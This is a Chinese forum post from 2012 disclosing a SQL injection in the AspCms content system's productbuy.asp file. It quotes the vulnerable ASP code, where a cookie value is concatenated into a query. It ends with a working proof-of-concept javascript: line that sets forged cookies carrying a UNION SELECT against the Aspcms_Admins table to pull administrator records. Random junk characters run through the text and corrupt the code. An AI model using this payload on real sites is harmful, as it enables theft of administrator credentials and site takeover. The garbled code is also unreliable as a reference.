好久没上土司了,上来一看发现在删号名单内.....) W/ L6 `- H& T: `% I. s
也没啥好发的,前些天路过某个小站,用的AspCms这个系统,搜索了下,productbuy.asp这个文件存在注射,但是目标已经修补....下载了代码,很奇葩的是productbuy.asp这个文件官方虽然修补了网上提到的漏洞,但是就在同一个文件下面找到了注射漏洞。。。。。。。
$ L: c% r- |, p& P废话不多说,看代码:
: m( x! p6 L4 w/ O) s; e& q5 v0 D; m! z, H: N# X
<%
& M3 A5 Q* I/ Z" x4 ]
- {" f+ b3 n" s. B2 Y/ v2 |if action = "buy" then) k; ~3 Q8 ~8 A5 p
" N n4 j. ^$ M2 c0 ?0 g
addOrder()
7 E# u9 Z% I a" S) t* @# v5 _" u& \* @: |" w0 h, ]. i
else
) i( o, T: k4 o5 W! I: E( l5 H" O4 X7 F2 k+ n- j
echoContent()
& _0 W* e; e" _4 @( I/ b- I- p; J5 V0 C3 }& ?0 N- J
end if
; U, r3 J7 @7 _6 J, m; E1 z9 O' X' P( r% a. g6 u# L
( B( [3 J0 F, ]! y; C& x, H! o a( \# U: V$ Y, N2 b. t- w
……略过
2 u- L5 M8 H: g% f$ C) Z
! M/ N- K. g4 [4 [' o
6 i9 {- L# G3 S" v* M/ _1 k6 _
" c8 r7 D: M6 o7 D8 CSub echoContent()' Q7 S0 r0 R5 g
2 G2 a& M' v8 x3 S
dim id
& x. c7 G) N, K
C2 w. R' ]* s" i% b" e1 ? id=getForm("id","get")' {7 H+ f8 t% K/ ^* p/ j
! a/ L. x9 S% r) G% I o# D , t8 a9 A+ ]$ _% X1 ?, D
9 k1 F! M' l$ z
if isnul(id) or not isnum(id) then alertMsgAndGo "请选择产品!","-1"
T& q6 w. N7 P) t' b. O
1 n7 u( J- b+ k9 \- g8 | v& _ I0 f- f. x# W/ f/ f
4 {' _. \1 R; S7 x dim templateobj,channelTemplatePath : set templateobj = mainClassobj.createObject("MainClass.template")9 \6 G* U* K7 A
8 k6 {- G& S" k; B dim typeIds,rsObj,rsObjtid,Tid,rsObjSmalltype,rsObjBigtype,selectproduct
/ U' d5 Z& {7 R$ b. [6 c8 G2 Y- ~: {3 A# q+ J5 n1 T$ U
Dim templatePath,tempStr4 Z; D ?# g! T) U
+ e8 Q6 A N2 E templatePath = "/"&sitePath&"templates/"&defaultTemplate&"/"&htmlFilePath&"/productbuy.html"# h# G P ~1 k! i& |6 y
+ M) |; v9 `- ~1 O4 G |
4 g# J* B# a0 R; y
/ V! R" B( b, q set rsObj=conn.Exec("select title from aspcms_news where newsID="&id,"r1")8 V; e" U) s0 H& z6 G
- X4 k0 L1 q8 U$ M5 L; F selectproduct=rsObj(0)0 d0 e: Z. @% S- @0 g
! r8 s4 M1 ]" G0 M7 T
, E, P6 H4 y K/ @0 c. z2 I
! n+ z1 |% G* Q+ x Dim linkman,gender,phone,mobile,email,qq,address,postcode
8 \9 [1 k! h o8 r9 j7 G- X$ E0 Y6 M& j
if isnul(rCookie("loginstatus")) then wCookie"loginstatus",00 t. ]) O( b0 k& ], O q" [& s3 x) `
, R# q- B0 I; J if rCookie("loginstatus")=1 then
. a" T: s9 a" \5 b/ p. P! {8 L5 p
set rsObj=conn.Exec("select * from aspcms_Users where UserID="&trim(rCookie("userID")),"r1")
, i& N3 u3 j7 Y% N- }; x; N2 b( J; k. H# G, c
linkman=rsObj("truename")
: Y6 [! \# y/ j5 s! Y1 ] C6 N* M
2 t; d: x. Q& g; `, }; K) U gender=rsObj("gender"): t# N5 U+ c# |- n3 s' U
: O! R) b4 ?1 H( w$ |$ r phone=rsObj("phone")) _ ~' h/ e2 L
# W4 l* w# x6 B- ^! F \5 v
mobile=rsObj("mobile")
, y7 _: l7 A3 w. B- ~( d6 E* J. N4 l- x
email=rsObj("email"); {1 N5 D* n/ Q; ?3 W
7 a$ r0 F. U) q
qq=rsObj("qq")$ E2 ?8 ~4 U, `8 e; @0 o4 b3 I/ V8 A
4 L9 m- W+ o' b; i+ J2 J0 C
address=rsObj("address")
o" _4 y: m4 w- [+ t
* C& u% [! D3 O1 |( a+ q postcode=rsObj("postcode") Y, Y9 E* h( j6 R
0 |6 B, g& ^% R* r else 4 d" L* L0 e0 K( T
R* W9 X3 g# b# Z9 P
gender=1
, |6 ^# q$ {' T9 y0 }# p' e& \/ h3 p- i+ z
end if
) l, E. M' [* C, _
: O2 `$ ?" B8 Y! Y- v0 k8 D rsObj.close() c/ n4 i) Q% B* U- t3 K6 K0 r
4 w5 h# r1 v% g; E& f7 z/ V* s
# n2 G1 ^( _/ n0 O
! \' \) @. A- F( Q with templateObj 5 c) @9 h' N" Z: ^! m
& N) X' W6 t5 m8 A% x# _7 r .content=loadFile(templatePath) 1 d! N6 |% I6 @# \9 z" U/ h; n0 v8 h
9 X$ N0 D2 i) e# Z7 F
.parseHtml()2 H0 Q/ y- D' o) y) n( q
. T: q1 Z" q, P
.content=replaceStr(.content,"{aspcms:selectproduct}",selectproduct)
$ M0 ]3 Q( U/ n0 G, P
8 W2 k8 u% l9 q% M0 _6 L! \ .content=replaceStr(.content,"[aspcms:linkman]",linkman)
5 i) d W- E- m" P% r! V4 M( ^0 `% `/ I
.content=replaceStr(.content,"[aspcms:gender]",gender) ! A- e& |; s8 E5 d
, ^# K/ D8 V$ P5 D) c/ S5 _: V
.content=replaceStr(.content,"[aspcms:phone]",phone) " A5 Y6 w1 W" ^6 f4 J8 o" t' R! O
2 s5 @; O3 ]9 W0 x" u
.content=replaceStr(.content,"[aspcms:mobile]",mobile) : X) Y0 k1 U# }- G+ k
0 r9 D& g: i5 R d
.content=replaceStr(.content,"[aspcms:email]",email) - G! Z) ]1 M% A" H
/ M9 U6 U) r1 L! x) [
.content=replaceStr(.content,"[aspcms:qq]",qq)
T. B8 R" p! _, K/ {5 E9 f/ b4 G9 N# r' R6 g! t
.content=replaceStr(.content,"[aspcms:address]",address) $ D2 b1 h, a$ e
5 i# {3 S6 Y. R7 x2 k% k, I
.content=replaceStr(.content,"[aspcms:postcode]",postcode)
& G; H6 Z/ Y. F' p2 |0 h! @8 o5 o1 }- o: {
.parseCommon() ' y2 i: A9 X( @8 R! W
/ @% n# O; g& E% t3 a! O$ O
echo .content - S; Q; F4 e/ |# x+ L8 |8 l
+ j4 @( x) i3 z# D, z: b( l1 [ end with
& r% h8 i( e7 @% {# q, l. c9 ?- C( l8 J% H6 w: o* y1 l# K
set templateobj =nothing : terminateAllObjects
& R+ f: u4 V" \5 I6 w/ {3 f5 \; t: X: H' b
End Sub
6 j" w' J1 T' ?0 d漏洞很明显,没啥好说的
+ l! H1 U! \$ F" Q# T4 |- _9 {0 |; upoc:
7 H# u3 H$ A( G/ D4 ?5 R* M9 o: i/ L* `/ N7 C8 c9 R8 g
javascript:alert(document.cookie="loginstatus=" + escape("1"));alert(document.cookie="userID=" + escape("1 union select 1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2 from [Aspcms_Admins]"));另外,脚本板块没权限发帖子
* K9 W% U0 ]0 {2 w5 A/ C- l/ V9 O/ a: g
|
发表于 2012-12-27 08:35:05
收藏
支持
反对